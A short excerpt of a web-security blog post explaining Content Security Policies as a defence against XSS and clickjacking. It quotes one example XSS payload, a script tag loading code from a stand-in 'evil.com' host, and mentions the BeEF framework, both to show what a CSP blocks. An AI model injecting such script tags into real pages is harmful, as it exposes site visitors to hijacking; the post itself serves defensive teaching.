Generating a CSP using a playwright script

Implementing Content Security Policies, The Easy Way.

What’s a CSP? One of the mitigating defenses for XSS attacks and Clickjacking attacks is a good Content Security Policy (CSP). While not a pancea, it can effectively limit the severity of any exploits by constraining the XSS payload size to the injection window, which is typically limited to a few characters. Instead of externally loading a payload like: <script src="https://evil.com/payload.js"/> the entire payload must be encoded in the script evaluation window, effectively preventing nasty frameworks like BeEF from being loaded....

// Kevin Pham · May 4, 2021